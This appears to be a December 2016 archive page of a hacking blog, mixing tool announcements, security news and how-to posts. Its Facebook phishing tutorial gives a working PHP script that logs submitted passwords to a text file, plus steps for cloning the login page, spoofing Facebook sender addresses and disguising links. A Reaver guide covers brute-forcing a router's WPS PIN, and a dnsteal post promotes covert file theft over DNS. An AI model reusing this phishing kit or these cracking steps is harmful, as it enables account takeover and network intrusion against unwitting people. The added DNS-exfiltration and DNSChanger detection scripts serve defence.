Monthly Archives: December 2016

Minion – Mozilla Security Testing Framework

Minion is a security testing framework built by Mozilla to bridge the gap between developers and security testers. To do so, it enables developers to scan with a wide variety of security tools, using a simple HTML-based interface.


It consists of three umbrella projects:

  • Minion Frontend, a Python, angular.js, and Bootstrap-based website that provides an HTML interface to authenticate and authorize users, manage sites, initiate scans, and report issues
  • Minion Backend, a Python, Flask, and Twisted-based backend that provides an API for the Minion Frontend, and acts as a middleman between the frontend and external security tools
  • Minion VM, a repository of recipes to allow quick installations of Minion either via Vagrant or Docker

Functionality

Minion has limited scanning functionality built into itself. Instead, it relies on the large variety of pre-existing open source and commercial scanning tools. These plugins include:

  • Minion ZAP, which utilizes the OWASP Zed Attack Proxy
  • Minion Nmap, utilizing the Nmap network scanner
  • Minion Skipfish, utilizing the Skipfish reconnaissance tool
  • Minion SSLyze, utilizing the SSLyze TLS scanner
  • Minion SSL, which uses the sslscan TLS scanner

You can download Minion here:

Back-end: minion-backendv0.3.zip
Front-end: minion-frontend-v0.4.zip

How to Anonymously Torrent Files with Tribler

A New, Anonymous Way to Torrent Files

Two Dutch researchers at Delft University have developed an anonymous way to share files without the need for torrent directory sites like Megaupload and Pirate Bay. Building upon a Tor-like technology, they have built an application that combines the functionality of the torrent directory sites with that of torrent clients like BitTorrent or uTorrent. It is called Tribler. It is developed for Windows, Mac OS X, and Linux, and you can download it here.

Tribler adds three layers of proxies between you and the seeder. This ensures that if one proxy is compromised, of limited anonymity, or placed there by an industry or government agency, the other two will still hide your traffic. The first proxy encrypts your traffic and each additional layer adds an additional level of encryption that only you can decrypt.

Searching + Torrenting

As you can see in the screenshot below, I have downloaded and installed it on a Windows 7 machine. Unlike BitTorrent and other torrenting applications, there is no need to download and install torrent files from a torrent directory. Tribler enables you to search and torrent in one application.

Streaming

Furthermore, Tribler allows you to stream the files to your computer that you find via the “Search” function at the top of the screen. You no longer have to wait for the whole file to download in order to watch it. Notice below that when I hover my mouse over the file, two orange buttons pop up, “Stream” and “Download.” If I click on Stream, I can begin watching immediately, no need to wait.

Anonymity

You can test the anonymity of Tribler by clicking on the “Downloads” tab on the left pane and Tribler will begin an automatic test of your anonymity showing you the proxy IDs and hops between you and the seeder of the file.

This new app, Tribler, offers you the anonymity to share files across the Internet without interference by government spy agencies and corporate hired guns. Enjoy, my nascent hackers, as we continue to keep the Internet free, open, and uncensored!

dnsteal – DNS Exfiltration Tool

dnsteal is a DNS exfiltration tool, essentially a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.


dnsteal is coded in Python and is available on Github.

Features

dnsteal currently has:

  • Support for multiple files
  • Gzip compression supported
  • Supports the customisation of subdomains
  • Customise bytes per subdomain and the length of filename

Usage

You can download dnsteal here:

dnsteal.py
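On the defender's side, the same properties listed under Features (file bytes packed into subdomain labels, chunk after chunk sent to one attacker-controlled zone) are what make this traffic stand out in resolver logs. The following is an added example, not part of dnsteal or of this post: it scores each query's labels by length and Shannon entropy and flags a client that keeps sending payload-like labels to one zone. The log lines are constructed in a BIND-style "query:" format, the attacker-example.test zone and the thresholds are assumptions, and the "zone is the last two labels" rule is a simplification a real deployment would replace with a public-suffix lookup.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed resolver log sample (BIND "query:" style), not captured from any real network.
# The files.attacker-example.test queries mimic the chunked-subdomain scheme described above:
# <chunk index>.<encoded bytes>.<chosen subdomain>.<attacker zone>.
SAMPLE_LOG = """\
10.0.0.5 query: www.example.com IN A
10.0.0.5 query: 0.q7Kd2pLm9XvA4ZbT8nRe3WcY.files.attacker-example.test IN A
10.0.0.5 query: mail.example.com IN MX
10.0.0.5 query: 1.H5sG1fJu6NwB0oPk3QrE9tMx.files.attacker-example.test IN A
10.0.0.7 query: d1f2e3a4b5c6d7e8f9a0b1c2.cdn.example.net IN A
10.0.0.5 query: 2.Vz2cD8lK4aF7mS1yU3gI9hO5.files.attacker-example.test IN A
10.0.0.5 query: 3.Y6bW0eT2xC8nA4jR1qL7vP3k.files.attacker-example.test IN A
"""

LOG_RE = re.compile(r"^(?P<client>\S+) query: (?P<name>\S+) IN (?P<qtype>\S+)$")


def shannon_entropy(text):
    """Bits per character: random base64-like payloads score high, hostnames score low."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line):
    """Return (client, qname, qtype), or None for lines that do not match the sample format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return m.group("client"), m.group("name").rstrip("."), m.group("qtype")


def split_name(qname):
    """Assumption: the attacker-controlled zone is the last two labels; every label before
    it is 'subdomain' that can carry data."""
    labels = qname.split(".")
    return labels[:-2], ".".join(labels[-2:])


def is_payload_label(label, min_len=20, min_entropy=3.5):
    """One long, high-entropy label looks like an encoded chunk rather than a hostname."""
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


def summarize(lines):
    """Aggregate per (client, zone): queries, subdomain bytes seen, payload-like queries."""
    stats = defaultdict(lambda: {"queries": 0, "subdomain_bytes": 0, "payload_queries": 0})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, qname, _ = parsed
        prefix, zone = split_name(qname)
        entry = stats[(client, zone)]
        entry["queries"] += 1
        entry["subdomain_bytes"] += sum(len(label) for label in prefix)
        if any(is_payload_label(label) for label in prefix):
            entry["payload_queries"] += 1
    return dict(stats)


def find_exfil_candidates(lines, min_payload_queries=3, min_bytes=40):
    """Flag (client, zone) pairs that repeatedly send payload-like labels. A single odd-looking
    CDN hostname is normal traffic; a stream of them to one zone is worth a look."""
    return sorted(
        key for key, s in summarize(lines).items()
        if s["payload_queries"] >= min_payload_queries and s["subdomain_bytes"] >= min_bytes
    )


if __name__ == "__main__":
    for client, zone in find_exfil_candidates(SAMPLE_LOG.splitlines()):
        print("possible DNS exfiltration: %s -> %s" % (client, zone))
```

The thresholds are deliberately two-stage: a label is only "payload-like" if it is both long and high-entropy, and a client is only reported once several such labels go to the same zone, which keeps the single hashed CDN hostname in the sample (10.0.0.7 to example.net) out of the report while the four chunk queries to attacker-example.test are flagged.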

How to Hack a Facebook Account Using a Phishing Web Page

Everyone is eager to hack the Facebook accounts of others. Here is the simplest method: using a phishing web page, you can hack the Facebook accounts of your friends.

Phishing Web Page:
Creating a web page that looks like another site is called phishing. By creating a phishing web page, you can make users believe that it is the original website and enter their ID and password.

Step 1:
Go to Facebook.com.
Right-click on the white space of the front page and select “View Page Source”.
Copy the code to Notepad.

Step 2:
Now search (press Ctrl+F) for “action=” in that code.
You will find code like this:

The big red ring circles the action= value that you have to change. Change it to ‘action=”next.php”’. After you have done that, change the method (small red circle in the picture) to “get” instead of “post”, or else it will not work. Save the document as index.html.

Step 3:
Now we need to create “next.php” to store the password, so open Notepad and type the following code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this file as “next.php”.

Update: I have updated the PHP script. Now it is working! Rectified all the problems and errors.

Step 4:
Open Notepad and just save the file as “pswrds.txt” without any contents.

Now upload those three files (namely index.html, next.php and pswrds.txt) to any subdomain web hosting site.
Note: that web hosting service must support PHP.
Use one of these sites: 110mb.com, spam.com, justfree.com or 007sites.com.
Use these sites through a secure-connection site (so that you can hide your IP address), like http://flyproxy.com. Find the best secure-connection site.

Step 5:
Create a mail account with a Facebook keyword, like: FACEBOOK@hotmail.com, Facebook@noreply.com, facebook_welcome@hotmail.com, facebook_friends@gmail.com

Step 6:

Copy the original Facebook friendship invitation and paste it into your mail.
Remove the hyperlink from this http:/www.facebook.com/n/?reqs.php
Mark it and push the Add Hyperlink button.
*Updated*
Everyone is asking doubts about this 6th step. You may get a Facebook friendship invitation from Facebook when someone does “add as a friend”, right? Just copy that mail and paste it into a compose-mail window. In that content, you can find this link: http:/www.facebook.com/n/?reqs.php . Just delete the link and create a link with the same text but pointing to your site.

The Add Hyperlink button is in the red circle. Now write your phisher page URL in the hyperlink bar that appears after clicking the button, and click Add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.

Note:
For users to believe it, change your phishing web page URL using any of the free short-URL sites,
like co.nr, co.cc, cz.cc.
This will make users believe that it is the correct URL.

Encryption backdoors are against US national interest, say lawmakers

Any attempt to weaken encryption is against the national interest, a group of US lawmakers has warned.

The widespread use of strong encryption has led to complaints from law enforcement agencies that they are unable to access the communications of criminals – the so-called ‘going dark’ issue. This has led to calls for government to order tech companies to install backdoors into the encryption they use, in order to allow investigators access to data. Critics of this move argue backdoors would weaken security and privacy for everyone, with little benefit to law enforcement.

“Any measure that weakens encryption works against the national interest,” the report said, and it also noted that encryption is a global technology that is widely and increasingly available. It also said that there are different attitudes to encryption and the going dark phenomenon, and so “there is no one-size-fits-all solution to the encryption challenge.” The group said Congress should foster cooperation between the law enforcement community and technology companies.

“Encryption is inexorably tied to our national interests. It is a safeguard for our personal secrets and economic prosperity. It helps to prevent crime and protect national security,” the report said, but added: “The widespread use of encryption technologies also complicates the missions of the law enforcement and intelligence communities,” and said those complications cannot be ignored.

How to detect and fix a machine infected with DNSChanger

On Mac systems open the Network system preferences and for each network service (Wi-Fi, Ethernet, Bluetooth, etc.), select the service and then click the “Advanced” button. Follow this by selecting the “DNS” tab and making note of the DNS servers listed. You can also do this in the Terminal by first running the following command:

[Screenshot: the DNS tab under the Advanced network settings, where the DNS configuration for each network connection is shown in OS X. Screenshot by Topher Kessler/CNET]

networksetup -listallnetworkservices

After this command is run, next run the following command on each of the listed names (be sure to remove any asterisks from in front of the names, and ensure the names are in quotes if there are any spaces in them):

networksetup -getdnsservers "SERVICE NAME"

Repeat this command for all listed services (especially Ethernet and Wi-Fi connections) to list all configured DNS servers.

On a Windows machine (including any of those you may have installed in a virtual machine), you can open the command-line tool (select “Run” from the Start menu and enter “cmd,” or in Windows 7 select “All Programs” and then choose the command line from the Accessories folder). In the command line, run the following command to list all network interface information, including configured DNS server IP addresses:

[Screenshot: Windows DNS server settings for all interfaces, as shown in the command line. Screenshot by Topher Kessler/CNET]

ipconfig /all

Once you have your system’s DNS servers listed, enter them into the FBI’s DNS checker Web page to see if they are identified as part of the rogue DNS network. In addition to manually looking up and checking your DNS settings, a number of Web services have popped up that will test your system for the DNSChanger malware. The DNSChanger Working Group has compiled a list of many of these services, which you can use to test your system (for those in the U.S., you can go to dns-ok.us to test your connection).

If these tests come up clean, then you have nothing to worry about; however, if they give you any warnings, then you can use an anti-malware scanner to check for and remove the DNSChanger malware. Given that the malware was abruptly halted in November 2011, there’s been ample time for security companies to update their anti-malware definitions to include all variants of DNSChanger. If you have a malware scanner and have not used it recently, then be sure to launch and update it fully, followed by performing a full scan of your system. Do this for every PC and Mac on your network, and in addition be sure to check your router’s settings to see if the DNS settings there are proper ones from your ISP or are rogue DNS settings.

If your router or computer is not showing any valid DNS server addresses after you have removed the malware, and your system is unable to connect to Internet services, then you might try configuring your system to use a public DNS service, such as those from OpenDNS and Google, by entering the following IP addresses into your system’s network settings:

8.8.8.8
8.8.4.4
208.67.222.222
208.67.220.220
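The manual procedure above (list the resolvers from networksetup or ipconfig /all, then check each one) is easy to script when you have many machines to go through. The following is an added example, not from CNET or the DNSChanger Working Group: it parses the two command outputs and reports every resolver that is not on a list you expect to see. The ipconfig and networksetup outputs are constructed samples, the EXPECTED_RESOLVERS set (the four public addresses listed above plus a made-up router address 192.168.1.1) is an assumption you would replace with your ISP's resolvers, and 203.0.113.53 is a documentation-range address standing in for "an address you did not configure", not a known rogue server. Anything the script reports is what you then paste into the FBI/DCWG checker.

```python
import ipaddress

# Assumption: the resolvers you expect on this network. The four public addresses are the
# ones listed above; 192.168.1.1 stands in for a home router's address (constructed value).
EXPECTED_RESOLVERS = {"8.8.8.8", "8.8.4.4", "208.67.222.222", "208.67.220.220", "192.168.1.1"}

# Constructed `ipconfig /all` excerpt, not captured from a real machine. 203.0.113.53 is a
# documentation-range address standing in for "an address you did not configure".
SAMPLE_IPCONFIG = """\
Windows IP Configuration

   Host Name . . . . . . . . . . . . : WORKSTATION01

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : example.lan
   IPv4 Address. . . . . . . . . . . : 192.168.1.20
   DNS Servers . . . . . . . . . . . : 192.168.1.1
                                       8.8.8.8

Wireless LAN adapter Wi-Fi:

   Media State . . . . . . . . . . . : Media disconnected
   DNS Servers . . . . . . . . . . . : 203.0.113.53
"""

# Constructed outputs of the two networksetup commands shown above.
SAMPLE_SERVICES = """\
An asterisk (*) denotes that a network service is disabled.
Wi-Fi
*Bluetooth PAN
Thunderbolt Bridge
"""
SAMPLE_GETDNS = "192.168.1.1\n203.0.113.53\n"
SAMPLE_GETDNS_NONE = "There aren't any DNS Servers set on Thunderbolt Bridge.\n"


def as_ip(token):
    """Normalised IP string, or None if the token is not an address (sentences, blanks, dots)."""
    try:
        return str(ipaddress.ip_address(token.strip()))
    except ValueError:
        return None


def parse_ipconfig(text):
    """Map each adapter to its DNS servers, including the continuation lines that
    `ipconfig /all` prints indented under the first 'DNS Servers' entry."""
    adapters, current, in_dns = {}, None, False
    for line in text.splitlines():
        if line and not line[0].isspace() and line.rstrip().endswith(":"):
            current, in_dns = line.rstrip()[:-1], False   # e.g. "Ethernet adapter Ethernet:"
            adapters[current] = []
            continue
        if current is None:
            continue
        stripped = line.strip()
        if stripped.startswith("DNS Servers"):
            in_dns = True
            first = as_ip(stripped.partition(" : ")[2])
            if first:
                adapters[current].append(first)
        elif in_dns and as_ip(stripped):
            adapters[current].append(as_ip(stripped))
        else:
            in_dns = False   # any other field ends the DNS server list
    return adapters


def parse_service_list(text):
    """Service names from `networksetup -listallnetworkservices`, with the leading asterisk
    that marks a disabled service removed and the explanatory header line dropped."""
    return [line.lstrip("*").strip() for line in text.splitlines()
            if line.strip() and "asterisk" not in line]


def parse_getdnsservers(text):
    """`networksetup -getdnsservers` prints one address per line, or a sentence when none are set."""
    return [ip for ip in (as_ip(line) for line in text.splitlines()) if ip]


def audit(resolvers_by_service, expected=EXPECTED_RESOLVERS):
    """Return {service: [resolver, ...]} for every resolver outside the expected set;
    look each of these up on the FBI/DCWG checker before trusting it."""
    report = {}
    for service, ips in resolvers_by_service.items():
        unexpected = [ip for ip in ips if ip not in expected]
        if unexpected:
            report[service] = unexpected
    return report


if __name__ == "__main__":
    # Windows: feed the captured `ipconfig /all` text.
    print(audit(parse_ipconfig(SAMPLE_IPCONFIG)))
    # macOS: one -getdnsservers call per name from -listallnetworkservices.
    mac = {"Wi-Fi": parse_getdnsservers(SAMPLE_GETDNS),
           "Thunderbolt Bridge": parse_getdnsservers(SAMPLE_GETDNS_NONE)}
    print(audit(mac))
```

Because the check is an allow-list rather than a block-list, a resolver that is merely unfamiliar shows up too; that is the intended behaviour here, since the article's instruction is to verify every configured server rather than to recognise only the known rogue ones. Remember to run the same check against the router's DNS settings, which this script does not reach.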

If after Monday you find you can no longer access the Internet, then it’s likely your system or network router is still configured with the rogue DNS servers and you will need to again attempt to detect and remove the malware from your systems. Luckily the malware is not viral in nature so it will not self-propagate and automatically re-infect systems. Therefore, once removed and once users have set up valid DNS servers on their systems, then the affected computers should have proper access to the Internet.

Background
DNS is the “Domain Name System,” which acts like the Internet’s phone book and translates human-friendly URLs such as “www.cnet.com” into their respective IP addresses that computers and routers use to establish connections. Since DNS is the interface between the typed URL and the targeted server, the crime ring created its own DNS network that would in large part work normally, but would also allow the ring to arbitrarily redirect the traffic for specific URLs to fake Web sites for the purposes of stealing personal information or getting people to click on ads.

Python Code For Accessing Physical Location

import pygeoip

# Path to a MaxMind GeoIP City database in the legacy .dat format that pygeoip reads.
gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat')

def printRecord(tgt):
    # Look up a hostname or IP address; the lookup returns None when it is not in the database.
    rec = gi.record_by_name(tgt)
    if rec is None:
        print('[-] No record found for ' + tgt)
        return
    city = rec['city']
    region = rec['region_name']
    country = rec['country_name']
    lon = rec['longitude']
    lat = rec['latitude']
    print('[*] Target: ' + tgt + ' Geo-located.')
    print('[+] ' + str(city) + ', ' + str(region) + ', ' + str(country))
    print('[+] Latitude: ' + str(lat) + ', Longitude: ' + str(lon))

tgt = 'ip address here'  # replace with the IP address or hostname to look up
printRecord(tgt)

Encryption Challenge

Description: The Encryption Challenge consists of 1 negative number, 1 neutral number, and all others are positive numbers.
Difficulty: unknown

05171606.05161220.16'12.1810161118.0510.132005.1605.241313.22101220.100405;.05171606.05161220.1612.1810161118.0510.0605241121.0409.241121.0617100405;.16.22072422142021.05171606!.

Hacking router with Reaver, guide to brute forcing Wifi Protected Setup

I thought I would share how easy it is to take down a router that is vulnerable to WPS attacks, like my own. Reaver is an open source tool that brute-forces WPS (Wi-Fi Protected Setup). This is the PIN (usually printed on the bottom of your router) that you can use to authenticate other devices to your wireless network without typing in a password. With enough time, Reaver can crack this PIN and reveal the WPA or WPA2 password.

Getting Started
To get started you will need to be on Linux, you will need the aircrack suite and Reaver installed, and your wireless NIC will need to be put into monitor mode. I’m using Ubuntu for this post, from a friend’s computer. You’ll notice I’ve masked some personal details in the images below to hide my router details. I’ll explain as we move along.

In Ubuntu (Debian) you can install aircrack and Reaver just like you install everything else.

If you need to download Ubuntu and need help installing it, you can use this page for help:
http://www.ubuntu.com/download/desktop

Next you need to put your wireless card into monitor mode (mon0). I’m using an internal wireless card, so my wireless interface is wlan0; however, you can run ifconfig to check whether you’re using wlan0 or wlan1. To put your interface into monitor mode you would run the following:

Next you need to obtain the unique identifier for the router you wish to crack. Here’s a screenshot of me running airodump to grab my access point’s BSSID. Masked for privacy reasons, but you get the point.

[Screenshot: airodump output showing the access point’s BSSID]

If you like, you can use the tool Wash to test whether WPS is enabled on the router in question. Notice that I used the argument --ignore-fcs in my syntax to hide any FCS errors. You can see from the picture below that WPS is enabled on the router found.

[Screenshot: wash output showing WPS enabled on the router]

Now you can start up reaver.

[Screenshot: starting Reaver]

Now Reaver runs for a while, trying to brute-force the WPS PIN.

[Screenshot: Reaver in progress]

After about 2 hours, Reaver hits my PIN and gives up the password for the router. In the screenshot I re-run Reaver with my PIN supplied first to save time. And that’s it. It’s that easy.

[Screenshot: Reaver reporting the recovered PIN and WPA password]

If you need any help with the commands you can ask for help, or read the man pages.

Protecting yourself
The easiest way to protect yourself is to turn WPS off; however, some routers don’t have an option to turn it off, and some routers are still vulnerable even if the feature is turned off. Personally I would recommend using a third-party firmware on your router like DD-WRT. DD-WRT doesn’t support WPS, so no worries there.

Further reading:
If you’re looking to learn more about wireless hacking and Reaver, here are some links I would suggest.

http://www.aircrack-ng.org – aircrack suite
http://code.google.com/p/reaver-wps/ – Reaver webpage, also has a point and click commercial version.

New ransomware lets you decrypt your files — by infecting other users

A new kind of ransomware comes with its own “referrals” program, one that you probably wouldn’t want to join.

The malware dubbed “Popcorn Time” locks your Windows computer’s files with strong AES-256 encryption, until you pay a ransom of one bitcoin (or $780 at the time of writing).

A series of screenshots tweeted by the MalwareHunterTeam, which found the ransomware, shows that the criminals purport to be Syrian, and that the money paid “will be used for food, medicine, and shelter to those in need.”

“We are extremely sorry that we are forcing you to pay but that’s the only way that we can keep living,” said the ransomware note.


(Image: MalwareHunterTeam)